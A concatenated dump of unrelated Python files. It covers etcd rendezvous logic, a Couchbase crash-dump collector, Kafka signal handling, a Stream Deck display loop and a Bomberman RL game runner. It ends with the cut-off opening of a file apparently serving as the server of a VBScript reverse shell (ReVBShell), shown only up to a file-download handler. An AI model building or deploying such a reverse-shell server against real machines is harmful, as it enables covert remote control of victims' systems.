prev_value=active_version.value,
ttl=None if finalize else CONST_ETCD_FROZEN_TTL,
)
self._lease_this_rank_stop = self.setup_lease_renewal(
this_lease_key, ttl=CONST_WORKER_KEEPALIVE_TTL
)
return active_version
except etcd.EtcdCompareFailed:
log.info("Confirm membership CAS unsuccessful, retrying")
def wait_for_final(self, expected_version):
"""
Helper method for the confirm phase
"""
active_version, state = self.get_rdzv_state()
while True:
if state["status"] == "final" and state["version"] == expected_version:
# Succcess. This rendezvous is final, and we accept it.
return active_version
elif state["status"] == "frozen" and state["version"] == expected_version:
# Continue waiting for any interesting events.
active_version, state = self.try_wait_for_state_change(
etcd_index=active_version.etcd_index + 1
)
else:
# No valid transition possible at this point
raise EtcdRendezvousRetryableFailure(
"Rendezvous state transition no longer possible. Must re-enter."
)
def announce_self_waiting(self, expected_version):
"""
Announce this worker is waiting (via num_workers_waiting counter) to join next
rendezvous, but only if state and version match.
"""
while True:
cas_delay()
active_version, state = self.get_rdzv_state()
if state["status"] != "final" or state["version"] != expected_version:
raise EtcdRendezvousRetryImmediately()
# Increment counter to signal an additional waiting worker.
state["num_workers_waiting"] += 1
try:
active_version = self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(state),
prev_value=active_version.value,
)
return active_version
except etcd.EtcdCompareFailed:
log.info("Announce self as waiting CAS unsuccessful, retrying")
def wait_for_rendezvous_to_free(self, expected_version):
"""
When there's an existing valid rendezvous in state 'final', we have to
wait until the next opportunity to join.
Such opportunity may come from:
1. rendezvous state changed by someone else, in which case we unblock and retry.
2. rendezvous becomes invalid because at least one member failed to renew their
leased keep_alive node. We detect this, and destroy the rendezvous.
"""
active_version, state = self.get_rdzv_state()
while True:
if state["status"] != "final" or state["version"] != expected_version:
return
# Check if current rendezvous state is valid, in the sense that all
# its members are alive (renewing their lease).
# If not, try destroy this rendezvous, so a new one can be created.
alive_members = self.client.get(
self.get_path("/rdzv/v_{version}".format(version=expected_version))
)
keep_alive_keys = [ch.key for ch in alive_members.children]
for key in state["keep_alives"]:
if key not in keep_alive_keys:
# This participant didn't renew their lease. We'll declare this
# rendezvous version as dead (but only if it hadn't changed)
log.info("Keep-alive key {} is not renewed.".format(key))
log.info(
"Rendevous version {} is incomplete. ".format(expected_version)
)
log.info("Attempting to destroy it.")
# Compare-and-delete operation. Throws if compare failed,
# which means rendezvous was already destroyed/re-created/closed,
# and we can try to re-enter the barrier.
self.client.delete(
key=self.get_path("/rdzv/active_version"),
prevValue=active_version.value,
)
log.info(
"Destroyed rendezvous version {} successfully.".format(
expected_version
)
)
# We can return (and retry) immediately
return
# Existing rendezvous seems valid, no reason to destroy it.
# We just have to wait until something changes and re-check.
try:
overall_timeout = (
max(self._rendezvous_deadline - time.time(), 0.0) + 1.0
)
self.client.watch(
key=self.get_path("/rdzv"),
index=active_version.etcd_index + 1,
recursive=True,
timeout=overall_timeout,
)
except (etcd.EtcdEventIndexCleared, etcd.EtcdWatchTimedOut):
pass
if time.time() > self._rendezvous_deadline:
raise RendezvousTimeoutError()
active_version, state = self.get_rdzv_state()
def handle_join_last_call(self, expected_version, deadline):
"""
After we reach min number of workers, one particular worker takes on the
responsibility of waiting an additional timeout before closing the join window.
If the worker responsible for this fails, the rendezvous will be destroyed due
to expiring TTL, and the other participants will re-rendezvous.
Here we expect to see state <joinable, expected_version>
Exit gracefully if either:
1. state becomes <frozen, expected_version>
2. timeout happens (reaching deadline), in which case
we try the tranisiton to <frozen, expected_version>
Exit with exception otherwise.
"""
active_version, state = self.get_rdzv_state()
while True:
if state["status"] == "frozen" and state["version"] == expected_version:
# Worker set became frozen before last-call timeout. This is possible
# when num_max_workers is reached before the tiemout.
return
if state["status"] != "joinable" or state["version"] != expected_version:
raise EtcdRendezvousRetryableFailure(
"Rendezvous state transition no longer possible. Must re-enter."
)
# If timeout occurred, attempt a state transition (joinable -> frozen)
if time.time() >= deadline:
state["status"] = "frozen"
state["keep_alives"] = []
try:
active_version = self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(state),
prev_value=active_version.value,
ttl=CONST_ETCD_FROZEN_TTL,
)
# We successfully made this rendezvous frozen.
return
except etcd.EtcdCompareFailed:
log.info("Join last-call transition CAS unsuccessful. Will retry")
cas_delay()
active_version, state = self.get_rdzv_state()
continue
# Timeout did not occur, so we must refresh TTL, and wait for
# further changes. Note: we only want TTL to be refreshed if
# state is still joinable, hence we use CAS for that here,
# even though we don't change any of the data.
try:
active_version = self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=active_version.value,
prev_value=active_version.value,
ttl=CONST_ETCD_JOINABLE_EPHEMERAL_TTL,
)
# Minimize "oversleeping":
timeout = min(
CONST_ETCD_JOINABLE_EPHEMERAL_TTL / 2,
deadline - time.time() + 1.0, # Oversleeping by 1s is ok.
)
active_version, state = self.try_wait_for_state_change(
etcd_index=active_version.etcd_index + 1, timeout=timeout
)
except etcd.EtcdCompareFailed:
log.info("Join last-call TTL refresh CAS unsuccessful, will retry")
cas_delay()
active_version, state = self.get_rdzv_state()
def set_closed(self):
"""
Mark rendezvous 'closed' for current run_id, which is used to signal other
participants to not attempt to perform (re-)rendezvous. This is useful
when one of the workers decides the job is complete.
"""
while True:
active_version, state = self.get_rdzv_state()
if state["status"] == "closed":
# Already closed by someone else.
return
state["status"] = "closed"
try:
self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(state),
prev_value=active_version.value,
)
return
except etcd.EtcdCompareFailed:
log.info("Set closed CAS unsuccessful, retrying")
cas_delay()
def get_rdzv_state(self):
active_version = self.client.get(key=self.get_path("/rdzv/active_version"))
return active_version, json.loads(active_version.value)
def try_wait_for_state_change(self, etcd_index, timeout=None):
# Don't sleep past the overall deadline (at least more than by 1s)
overall_timeout = max(self._rendezvous_deadline - time.time(), 0.0) + 1.0
timeout = overall_timeout if timeout is None else min(timeout, overall_timeout)
try:
self.client.watch(
self.get_path("/rdzv/active_version"), index=etcd_index, timeout=timeout
)
except (etcd.EtcdEventIndexCleared, etcd.EtcdWatchTimedOut):
pass
if time.time() > self._rendezvous_deadline:
raise RendezvousTimeoutError()
# Unfortunately, we have to do another fetch in order to get last etcd_index.
return self.get_rdzv_state()
def get_path(self, path):
if not path.startswith("/"):
path = "/" + path
return "{prefix}run_{run_id}{path}".format(
prefix=self._prefix, run_id=self._run_id, path=path
)
def create_path_if_not_exists(self, full_path, ttl=None):
try:
self.client.write(
key=full_path, value=None, dir=True, prevExist=False, ttl=ttl
)
except etcd.EtcdAlreadyExist:
pass
def setup_lease_renewal(self, full_path, ttl):
# NOTE: For ephemeral key TTL renewal (~lease) to work correctly,
# make sure you don't call any long-blocking methods that do not
# release the Python's GIL! An example of this is calling a pybind11
# extension function that is blocking / long-running, but is not
# doing a scoped release of the GIL.
def lease_worker(client, path, ttl, stop_event):
while True:
try:
client.refresh(path, ttl=ttl)
except etcd.EtcdKeyNotFound:
break
except ConnectionRefusedError:
# This error usually occurs during test when the server already got terminated but the
# python garbage collector have not yet invoked the __del__ method.
break
if stop_event.wait(timeout=ttl / 2):
break
lease_stop_event = threading.Event()
lease_thread = threading.Thread(
target=lease_worker, args=(self.client, full_path, ttl, lease_stop_event)
)
lease_thread.daemon = True
lease_thread.start()
return lease_stop_event
def store_extra_data(self, rdzv_version, key, value):
node = self.get_path("/rdzv/v_{}/extra_data".format(rdzv_version))
try:
# If first time we are storing anything:
extra_data = self.client.write(
key=node, value=json.dumps({key: value}), prevExist=False
)
return
except etcd.EtcdAlreadyExist:
pass
# CAS loop, to make sure we don't lose concurrent stores.
while True:
# We never delete extra_data. Failure here should be fatal, no special handling.
extra_data = self.client.get(node)
new_extra_data_value = json.loads(extra_data.value)
new_extra_data_value[key] = value
try:
extra_data = self.client.test_and_set(
key=node,
value=json.dumps(new_extra_data_value),
prev_value=extra_data.value,
)
return
except etcd.EtcdCompareFailed:
log.info("Store extra_data CAS unsuccessful, retrying")
time.sleep(0.1)
def load_extra_data(self, rdzv_version, key, timeout=None):
# 'extra_data' node itself, and the directory it is located in:
node = self.get_path("/rdzv/v_{}/extra_data".format(rdzv_version))
node_dir = self.get_path("/rdzv/v_{}".format(rdzv_version))
# TODO: implement timeout
# https://github.com/pytorch/elastic/issues/12
while True:
# Combined wait for the node itself, and the key inside it.
root = self.client.get(node_dir)
# Find the extra_data node, if it exists
extra_data = [n for n in root.children if n.key == node]
assert len(extra_data) <= 1
# Node for extra_data exists, check the desired key inside it.
if len(extra_data) == 1:
extra_data_dict = json.loads(extra_data[0].value)
if key in extra_data_dict:
return extra_data_dict[key]
# The 'extra_data' node doesn't exist, or they key isn't published yet.
# Wait for interesting events on the extra_data node and retry.
try:
self.client.watch(node, index=root.etcd_index + 1)
except (etcd.EtcdEventIndexCleared, etcd.EtcdWatchTimedOut):
pass
def setup_kv_store(self, rdzv_version):
store_path = self.get_path(f"/rdzv/v_{rdzv_version}/kv")
self.create_path_if_not_exists(store_path)
return EtcdStore(etcd_client=self.client, etcd_store_prefix=store_path)
def _create_etcd_client(params: RendezvousParameters) -> etcd.Client:
"""
Creates a new ``etcd.Client`` from the specified ``RendezvousParameters``.
"""
hostname, port = parse_rendezvous_endpoint(params.endpoint, 2379)
# The communication protocol
protocol = params.config.get("protocol")
if protocol is None:
protocol = "http"
else:
if protocol != "http" and protocol != "https":
raise ValueError("The etcd protocol must be HTTP or HTTPS.")
# The SSL client certificate
ssl_cert = params.config.get("cert")
if ssl_cert is not None:
cert_key = params.config.get("key")
if cert_key is not None:
# The etcd client expects the certificate key as the second element
# of the `cert` tuple.
ssl_cert = (ssl_cert, cert_key)
# The root certificate
ca_cert = params.config.get("cacert")
return etcd.Client(
hostname,
port,
protocol=protocol,
cert=ssl_cert,
ca_cert=ca_cert,
allow_reconnect=True,
)
# Handler for torch.distributed "static" registration
def create_rdzv_handler(params: RendezvousParameters) -> RendezvousHandler:
"""
Usage:
::
rdzv_params = RendezvousParameters(
backend="etcd",
endpoint="192.168.0.42:2379",
run_id="123",
min_nodes=4,
max_nodes=8,
timeout=300,
last_call_timeout=30,
etcd_prefix="custom_prefix",
protocol="https",
cacert="/etc/kubernetes/certs/ca.crt",
cert="/etc/kubernetes/certs/client.crt",
key="/etc/kubernetes/certs/client.key")
# -- or --
rdzv_params = RendezvousParameters(
backend="etcd",
endpoint="192.168.0.42:2379",
run_id="123",
min_nodes=4,
max_nodes=8)
etcd_rdzv_handler = create_etcd_rendezvous_handler(rdzv_params)
Where:
run_id - unique id for this training job instance,
min_nodes - min number of workers expected to join the rendezvous,
max_nodes - max number of workers allowed to join the rendezvous,
defaults to min_workers is not specified.
timeout - total timeout within which next_rendezvous is expected to
succeed; a RendezvousTimeoutError is raised otherwise;
Defaults is 600 (10 minutes).
last_call_timeout - additional wait amount ("last call") after
min number of workers has been reached.
Defaults to 30 seconds.
etcd_prefix - path prefix (from etcd root), inside which all
etcd nodes will be created.
Default is "/torchelastic/p2p".
protocol - http (default) or https to access etcd.
cacert - CA cert to access etcd, only makes sense with https.
cert - client cert to access etcd, only makes sense with https.
key - client key to access etcd, only makes sense with https.
"""
client = _create_etcd_client(params)
etcd_prefix = params.get("etcd_prefix", "/torchelastic/p2p")
rdzv = EtcdRendezvous(
client=client,
prefix=etcd_prefix,
run_id=params.run_id,
num_min_workers=params.min_nodes,
num_max_workers=params.max_nodes,
timeout=params.get_as_int("timeout", _DEFAULT_TIMEOUT),
last_call_timeout=params.get_as_int("last_call_timeout", _DEFAULT_LAST_CALL_TIMEOUT),
)
return EtcdRendezvousHandler(rdzv_impl=rdzv)
|
getcoredumps.py
|
#!/usr/bin/env python
import getopt
import sys
import os
import time
from threading import Thread
sys.path.append('.')
sys.path.append('lib')
from remote.remote_util import RemoteMachineShellConnection
from TestInput import TestInputParser
def usage(error=None):
print("""\
Syntax: getcoredumps.py [options]
Options
-i <file> Path to .ini file containing cluster information.
-p <key=val,...> Comma-separated key=value info.
Available keys:
path=<file_path> The destination path you want to put your zipped diag file
Example:
getcoredumps.py -i cluster.ini -p path=/tmp/nosql
""")
sys.exit(error)
class Getcoredumps(object):
def __init__(self, server, path):
self.server = server
self.path = path
def run(self):
remote = RemoteMachineShellConnection(self.server)
server_type = 'membase'
if remote.is_couchbase_installed():
server_type = 'couchbase'
stamp = time.strftime("%d_%m_%Y_%H_%M")
try:
info = remote.extract_remote_info()
if info.type.lower() != 'windows':
core_files = []
print("looking for crashes on {0} ... ".format(info.ip))
print("erl_crash files under /opt/{0}/var/lib/{0}/".format(server_type))
core_files.extend(remote.file_starts_with("/opt/{0}/var/lib/{0}/".format(server_type), "erl_crash"))
print("core* files under /opt/{0}/var/lib/{0}/".format(server_type))
core_files.extend(remote.file_starts_with("/opt/{0}/var/lib/{0}/".format(server_type), "core"))
print("core* files under /tmp/")
core_files.extend(remote.file_starts_with("/tmp/", "core"))
print("breakpad *dmp files under /opt/{0}/var/lib/{0}/".format(server_type))
core_files.extend(remote.file_ends_with("/opt/{0}/var/lib/{0}/".format(server_type), ".dmp"))
if core_files:
print("found crashes on {0}: {1}".format(info.ip, core_files))
else:
print("crashes not found on {0}".format(info.ip))
i = 0
for core_file in core_files:
if core_file.find('erl_crash.dump') != -1:
#let's just copy that file back
erl_crash_file_name = "erlang-{0}-{1}.log".format(self.server.ip, i)
remote_path, file_name = os.path.dirname(core_file), os.path.basename(core_file)
if remote.get_file(remote_path, file_name, os.path.join(self.path, erl_crash_file_name)):
print('downloaded core file : {0}'.format(core_file))
i += 1
elif core_file.find('.dmp') != -1:
breakpad_crash_file_name = "breakpad-{0}-{1}.dmp".format(self.server.ip, i)
remote_path, file_name = os.path.dirname(core_file), os.path.basename(core_file)
if remote.get_file(remote_path, file_name, os.path.join(self.path, breakpad_crash_file_name)):
print('downloaded breakpad .dmp file : {0}'.format(core_file))
i += 1
else:
command = "/opt/{0}/bin/tools/cbanalyze-core".format(server_type)
core_file_name = "core-{0}-{1}.log".format(self.server.ip, i)
core_log_output = "/tmp/{0}".format(core_file_name)
output, _ = remote.execute_command('{0} {1} -f {2}'.format(command, core_file, core_log_output))
print(output)
remote_path, file_name = os.path.dirname(core_log_output), os.path.basename(core_log_output)
if remote.get_file(remote_path, file_name, os.path.join(self.path, core_file_name)):
print('downloaded core backtrace : {0}'.format(core_log_output))
i += 1
if i > 0:
command = "mkdir -p /tmp/backup_crash/{0};" \
"mv -f /tmp/core* /tmp/backup_crash/{0};" \
"mv -f /opt/{1}/var/lib/{1}/erl_crash.dump* /tmp/backup_crash/{0}; " \
"mv -f /opt/{1}/var/lib/{1}/*.dmp /tmp/backup_crash/{0};" \
"mv -f /opt/{1}/var/lib/{1}/crash/*.dmp /tmp/backup_crash/{0};".\
format(stamp, server_type)
print("put all crashes on {0} in backup folder: /tmp/backup_crash/{1}".format(self.server.ip, stamp))
remote.execute_command(command)
output, error = remote.execute_command("ls -la /tmp/backup_crash/{0}".format(stamp))
for o in output:
print(o)
remote.disconnect()
return True
if remote:
remote.disconnect()
return False
except Exception as ex:
print(ex)
return False
class Clearcoredumps(object):
def __init__(self, server, path):
self.server = server
self.path = path
def run(self):
remote = RemoteMachineShellConnection(self.server)
server_type = 'membase'
if remote.is_couchbase_installed():
server_type = 'couchbase'
stamp = time.strftime("%d_%m_%Y_%H_%M")
try:
info = remote.extract_remote_info()
if info.type.lower() != 'windows':
core_files = []
print("looking for Erlang/Memcached crashes on {0} ... ".format(info.ip))
core_files.extend(remote.file_starts_with("/opt/{0}/var/lib/{0}/".format(server_type), "erl_crash"))
core_files.extend(remote.file_starts_with("/opt/{0}/var/lib/{0}/".format(server_type), "core"))
core_files.extend(remote.file_starts_with("/tmp/", "core"))
core_files.extend(remote.file_ends_with("/opt/{0}/var/lib/{0}/crash".format(server_type), ".dmp"))
if core_files:
print("found dumps on {0}: {1}".format(info.ip, core_files))
command = "mkdir -p /tmp/backup_crash/{0};" \
"mv -f /tmp/core* /tmp/backup_crash/{0};" \
"mv -f /opt/{1}/var/lib/{1}/erl_crash.dump* /tmp/backup_crash/{0}; " \
"mv -f /opt/{1}/var/lib/{1}/crash/*.dmp /tmp/backup_crash/{0};".\
format(stamp, server_type)
print("Moved all dumps on {0} to backup folder: /tmp/backup_crash/{1}".format(self.server.ip, stamp))
remote.execute_command(command)
output, error = remote.execute_command("ls -la /tmp/backup_crash/{0}".format(stamp))
for o in output:
print(o)
for core_file in core_files:
remote_path, file_name = os.path.dirname(core_file), os.path.basename(core_file)
if remote.delete_file(remote_path, file_name):
print('deleted core file : {0}'.format(core_file))
remote.disconnect()
else:
print("dump files not found on {0}".format(info.ip))
if remote:
remote.disconnect()
except Exception as ex:
print(ex)
def main():
try:
(opts, args) = getopt.getopt(sys.argv[1:], 'hi:p', [])
for o, a in opts:
if o == "-h":
usage()
input = TestInputParser.get_test_input(sys.argv)
if not input.servers:
usage("ERROR: no servers specified. Please use the -i parameter.")
except IndexError:
usage()
except getopt.GetoptError as error:
usage("ERROR: " + str(error))
file_path = input.param("path", ".")
remotes = (Getcoredumps(server, file_path) for server in input.servers)
remote_threads = [Thread(target=remote.run) for remote in remotes]
for remote_thread in remote_threads:
remote_thread.daemon = True
remote_thread.start()
run_time = 0
while remote_thread.isAlive() and run_time < 1200:
time.sleep(15)
run_time += 15
print("Waiting for another 15 seconds (time-out after 20 min)")
if run_time == 1200:
print("collect core dumps hung on this node. Jumping to next node")
print("collect core dumps info done")
for remote_thread in remote_threads:
remote_thread.join(120)
if remote_thread.isAlive():
raise Exception("collect core dumps hung on remote node")
if __name__ == "__main__":
main()
|
manager.py
|
import logging
logger = logging.getLogger(__name__)
logger.debug("Loaded " + __name__)
import os
import sys
import signal
from kafka_connector import KafkaConnector
import threading
class Manager(object):
Type = "Manager"
def __init__(self, **kwargs):
super(Manager, self).__init__()
self.behaviour = kwargs.get('behaviour')
self.connector_type = kwargs.get('connector_type')
self.kafka_client_type = kwargs.get('kafka_client_type')
self.kafka_client_config = kwargs.get('kafka_client_config')
self.connected_behaviour = KafkaConnector(
self.behaviour,
kafka_client_type=self.kafka_client_type,
**self.kafka_client_config)
self.signal_map = kwargs.get('signal_map', {})
# Set Kafka Enable/Disable on SIGUSR2 (12)
signal.signal(10, self.receiveSignal)
signal.signal(12, self.receiveSignal)
def run(self):
logger.info("Manager run() called.")
main_connector_thread = threading.Thread(target=self.connected_behaviour.run)
main_connector_thread.start()
def onStart(self):
logger.info("Manager onStart() called.")
def onExit(self):
logger.info("Manager onExit() called.")
# Handling Signals
def receiveSignal(self, signal_number, frame):
print('Received:', signal_number)
if(signal_number in self.signal_map):
f = self.signal_map[signal_number]
f['func'](*f['args'], **f['kwargs'])
# Set Kafka Enable/Disable on SIGUSR2 (12)
if(signal_number == 10):
logger.info("Enaling Kafka")
self.connected_behaviour.enable_kafka()
if(signal_number == 12):
logger.info("Disabling Kafka")
self.connected_behaviour.disable_kafka()
def onSignal(self):
logger.info("Manager Signal Handler Initialized.")
logger.info('My PID is:{}'.format(str(os.getpid())))
# Register signals
for k,v in self.signal_map.items():
print("Registering Signal = {}".format(k))
signal.signal(k, self.receiveSignal)
|
display_grid.py
|
import threading
from time import sleep, time
from typing import Callable, Dict, List, Optional
from PIL import Image
from StreamDeck.Devices.StreamDeck import StreamDeck
from StreamDeck.ImageHelpers import PILHelper
from StreamDeck.Transport.Transport import TransportError
from streamdeck_ui.display.empty_filter import EmptyFilter
from streamdeck_ui.display.filter import Filter
from streamdeck_ui.display.keypress_filter import KeypressFilter
from streamdeck_ui.display.pipeline import Pipeline
class DisplayGrid:
"""
A DisplayGrid is made up of a collection of pipelines, each processing
filters for one individual button display.
"""
_empty_filter: EmptyFilter = EmptyFilter()
"Static instance of EmptyFilter shared by all pipelines"
def __init__(self, lock: threading.Lock, streamdeck: StreamDeck, pages: int, cpu_callback: Callable[[str, int], None], fps: int = 25):
"""Creates a new display instance
:param lock: A lock object that will be used to get exclusive access while enumerating
Stream Decks. This lock must be shared by any object that will read or write to the
Stream Deck.
:type lock: threading.Lock
:param streamdeck: The StreamDeck instance associated with this display
:type streamdeck: StreamDeck
:param pages: The number of logical pages (screen sets)
:type pages: int
:param cpu_callback: A function to call whenever the CPU changes
:type cpu_callback: Callable[[str, int], None]
:param fps: The desired FPS, defaults to 25
:type fps: int, optional
"""
self.streamdeck = streamdeck
# Reference to the actual device, used to update icons
self.size = streamdeck.key_image_format()["size"]
self.serial_number = streamdeck.get_serial_number()
self.pages: Dict[int, Dict[int, Pipeline]] = {}
# A dictionary of lists of pipelines. Each page has
# a list, corresponding to each button.
# Initialize with a pipeline per key for all pages
for page in range(pages):
self.pages[page] = {}
for button in range(self.streamdeck.key_count()):
self.pages[page][button] = Pipeline()
self.current_page: int = -1
self.pipeline_thread: Optional[threading.Thread] = None
self.quit = threading.Event()
self.fps = fps
# Configure the maximum frame rate we want to achieve
self.time_per_frame = 1 / fps
self.lock = lock
self.sync = threading.Event()
self.cpu_callback = cpu_callback
# The sync event allows a caller to wait until all the buttons have been processed
DisplayGrid._empty_filter.initialize(self.size)
def replace(self, page: int, button: int, filters: List[Filter]):
with self.lock:
pipeline = Pipeline()
pipeline.add(DisplayGrid._empty_filter)
for filter in filters:
filter.initialize(self.size)
pipeline.add(filter)
keypress = KeypressFilter()
keypress.initialize(self.size)
pipeline.add(keypress)
self.pages[page][button] = pipeline
def get_image(self, page: int, button: int) -> Image.Image:
with self.lock:
# REVIEW: Consider returning not the last result, but an thumbnail
# or something that represents the current "static" look of
# a button. This will need to be added to the interface
# of a filter.
return self.pages[page][button].last_result()
def set_keypress(self, button: int, active: bool):
with self.lock:
for filter in self.pages[self.current_page][button].filters:
if isinstance(filter[0], KeypressFilter):
filter[0].active = active
def synchronize(self):
# Wait until the next cycle is complete.
# To *guarantee* that you have one complete pass, two waits are needed.
# The first gets you to the end of one cycle (you could have called it
# mid cycle). The second gets you one pass through. Worst case, you
# do two full cycles. Best case, you do 1 full and one partial.
self.sync.wait()
self.sync.wait()
def _run(self):
"""Method that runs on background thread and updates the pipelines."""
frames = 0
start = time()
last_page = -1
execution_time = 0
frame_cache = {}
while not self.quit.isSet():
current_time = time()
with self.lock:
page = self.pages[self.current_page]
force_update = False
if last_page != page:
# When a page switch happen, force the pipelines to redraw so icons update
force_update = True
last_page = page
pipeline_cache_count = 0
for button, pipeline in page.items():
# Process all the steps in the pipeline and return the resulting image
with self.lock:
image, hashcode = pipeline.execute(current_time)
pipeline_cache_count += len(pipeline.output_cache)
# If none of the filters in the pipeline yielded a change, use
# the last known result
if force_update and image is None:
image = pipeline.last_result()
if image:
# We cannot afford to do this conversion on every final frame.
# Since we want the flexibilty of a pipeline engine that can mutate the
# images along a chain of filters, the outcome can be somewhat unpredicatable
# For example - a clock that changes time or an animation that changes
# the frame and font that overlays. In many instances there is a finite
# number of frames per pipeline (a looping GIF with image, a pulsing icon etc)
# Some may also be virtually have infinite mutations. A cache per pipeline
# with an eviction policy of the oldest would likely suffice.
# The main problem is since the pipeline can mutate it's too expensive to
# calculate the actual hash of the final frame.
# Create a hash function that the filter itself defines. It has to
# update the hashcode with the unique attributes of the input it requires
# to make the frame. This could be time, text, frame number etc.
# The hash can then be passed to the next step and XOR'd or combined
# with the next hash. This yields a final hash code that can then be
# used to cache the output. At the end of the pipeline the hash can
# be checked and final bytes will be ready to pipe to the device.
# FIXME: This will be unbounded, old frames will need to be evicted
if hashcode not in frame_cache:
image = PILHelper.to_native_format(self.streamdeck, image)
frame_cache[hashcode] = image
else:
image = frame_cache[hashcode]
try:
with self.lock:
self.streamdeck.set_key_image(button, image)
except TransportError:
# Review - deadlock if you wait on yourself?
self.stop()
pass
return
self.sync.set()
self.sync.clear()
# Calculate how long we took to process the pipeline
elapsed_time = time() - current_time
execution_time += elapsed_time
# Calculate how much we have to sleep between processing cycles to maintain the desired FPS
# If we have less than 5ms left, don't bother sleeping, as the context switch and
# overhead of sleeping/waking up is consumed
time_left = self.time_per_frame - elapsed_time
if time_left > 0.005:
sleep(time_left)
frames += 1
if time() - start > 1.0:
execution_time_ms = int(execution_time * 1000)
if self.cpu_callback:
self.cpu_callback(self.serial_number, int(execution_time_ms / 1000 * 100))
# execution_time_ms = int(execution_time * 1000)
# print(f"FPS: {frames} Execution time: {execution_time_ms} ms Execution %: {int(execution_time_ms/1000 * 100)}")
# print(f"Output cache size: {len(frame_cache)}")
# print(f"Pipeline cache size: {pipeline_cache_count}")
execution_time = 0
frames = 0
start = time()
def set_page(self, page: int):
"""Switches to the given page. Pipelines for that page starts running,
other page pipelines stop.
Args:
page (int): The page number to switch to.
"""
with self.lock:
if self.current_page > 0:
# Ensure none of the button filters are active anymore
old_page = self.pages[self.current_page]
for _, pipeline in old_page.items():
for filter in pipeline.filters:
if isinstance(filter[0], KeypressFilter):
filter[0].active = False
# REVIEW: We could detect the active key on the last page, and make it active
# on the target page
self.current_page = page
def start(self):
if self.pipeline_thread is not None:
self.quit.set()
try:
self.pipeline_thread.join()
except RuntimeError:
pass
self.quit.clear()
self.pipeline_thread = threading.Thread(target=self._run)
self.pipeline_thread.daemon = True
self.pipeline_thread.start()
self.synchronize()
# Wait for first frames to become ready
def stop(self):
if self.pipeline_thread is not None:
self.quit.set()
try:
self.pipeline_thread.join()
except RuntimeError:
pass
self.pipeline_thread = None
|
main.py
|
import os
import sys
import threading
from argparse import ArgumentParser
from time import sleep, time
import settings as s
from environment import BombeRLeWorld, GenericWorld
from fallbacks import pygame, tqdm, LOADED_PYGAME
from replay import ReplayWorld
# Function to run the game logic in a separate thread
def game_logic(world: GenericWorld, user_inputs, args):
last_update = time()
while True:
now = time()
if args.turn_based and len(user_inputs) == 0:
sleep(0.1)
continue
elif world.gui is not None and (now - last_update < args.update_interval):
sleep(args.update_interval - (now - last_update))
continue
last_update = now
if world.running:
world.do_step(user_inputs.pop(0) if len(user_inputs) else 'WAIT')
def main(argv = None):
parser = ArgumentParser()
subparsers = parser.add_subparsers(dest='command_name', required=True)
# Run arguments
play_parser = subparsers.add_parser("play")
agent_group = play_parser.add_mutually_exclusive_group()
agent_group.add_argument("--my-agent", type=str, help="Play agent of name ... against three rule_based_agents")
agent_group.add_argument("--agents", type=str, nargs="+", default=["rule_based_agent"] * s.MAX_AGENTS, help="Explicitly set the agent names in the game")
play_parser.add_argument("--train", default=0, type=int, choices=[0, 1, 2, 3, 4],
help="First … agents should be set to training mode")
play_parser.add_argument("--continue-without-training", default=False, action="store_true")
# play_parser.add_argument("--single-process", default=False, action="store_true")
play_parser.add_argument("--n-rounds", type=int, default=10, help="How many rounds to play")
play_parser.add_argument("--save-replay", const=True, default=False, action='store', nargs='?', help='Store the game as .pt for a replay')
play_parser.add_argument("--no-gui", default=False, action="store_true", help="Deactivate the user interface and play as fast as possible.")
# Replay arguments
replay_parser = subparsers.add_parser("replay")
replay_parser.add_argument("replay", help="File to load replay from")
# Interaction
for sub in [play_parser, replay_parser]:
sub.add_argument("--fps", type=int, default=15, help="FPS of the GUI (does not change game)")
sub.add_argument("--turn-based", default=False, action="store_true",
help="Wait for key press until next movement")
sub.add_argument("--update-interval", type=float, default=0.1,
help="How often agents take steps (ignored without GUI)")
sub.add_argument("--log_dir", type=str, default=os.path.dirname(os.path.abspath(__file__)) + "/logs")
# Video?
sub.add_argument("--make-video", default=False, action="store_true",
help="Make a video from the game")
args = parser.parse_args(argv)
if args.command_name == "replay":
args.no_gui = False
args.n_rounds = 1
has_gui = not args.no_gui
if has_gui:
if not LOADED_PYGAME:
raise ValueError("pygame could not loaded, cannot run with GUI")
pygame.init()
# Initialize environment and agents
if args.command_name == "play":
agents = []
if args.train == 0 and not args.continue_without_training:
args.continue_without_training = True
if args.my_agent:
agents.append((args.my_agent, len(agents) < args.train))
args.agents = ["rule_based_agent"] * (s.MAX_AGENTS - 1)
for agent_name in args.agents:
agents.append((agent_name, len(agents) < args.train))
world = BombeRLeWorld(args, agents)
elif args.command_name == "replay":
world = ReplayWorld(args)
else:
raise ValueError(f"Unknown command {args.command_name}")
# Emulate Windows process spawning behaviour under Unix (for testing)
# mp.set_start_method('spawn')
user_inputs = []
# Start game logic thread
t = threading.Thread(target=game_logic, args=(world, user_inputs, args), name="Game Logic")
t.daemon = True
t.start()
# Run one or more games
for _ in tqdm(range(args.n_rounds)):
if not world.running:
world.ready_for_restart_flag.wait()
world.ready_for_restart_flag.clear()
world.new_round()
# First render
if has_gui:
world.render()
pygame.display.flip()
round_finished = False
last_frame = time()
user_inputs.clear()
# Main game loop
while not round_finished:
if has_gui:
# Grab GUI events
for event in pygame.event.get():
if event.type == pygame.QUIT:
if world.running:
world.end_round()
world.end()
return
elif event.type == pygame.KEYDOWN:
key_pressed = event.key
if key_pressed in (pygame.K_q, pygame.K_ESCAPE):
world.end_round()
if not world.running:
round_finished = True
# Convert keyboard input into actions
if s.INPUT_MAP.get(key_pressed):
if args.turn_based:
user_inputs.clear()
user_inputs.append(s.INPUT_MAP.get(key_pressed))
# Render only once in a while
if time() - last_frame >= 1 / args.fps:
world.render()
pygame.display.flip()
last_frame = time()
else:
sleep_time = 1 / args.fps - (time() - last_frame)
if sleep_time > 0:
sleep(sleep_time)
elif not world.running:
round_finished = True
else:
# Non-gui mode, check for round end in 1ms
sleep(0.001)
world.end()
if __name__ == '__main__':
main()
|
VBS_Rev_Shell_SERVER.py
|
# https://github.com/bitsadmin/ReVBShell
#
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import cgi
import os
import sys
from Queue import Queue
from threading import Thread
from shutil import copyfile, rmtree
import ntpath
PORT_NUMBER = 8080
class myHandler(BaseHTTPRequestHandler):
def do_GET(self):
# File download
if self.path.startswith('/f/'):
# Compile path
filename = ntpath.basename(self.path)
filepath = './upload/%s' % filename
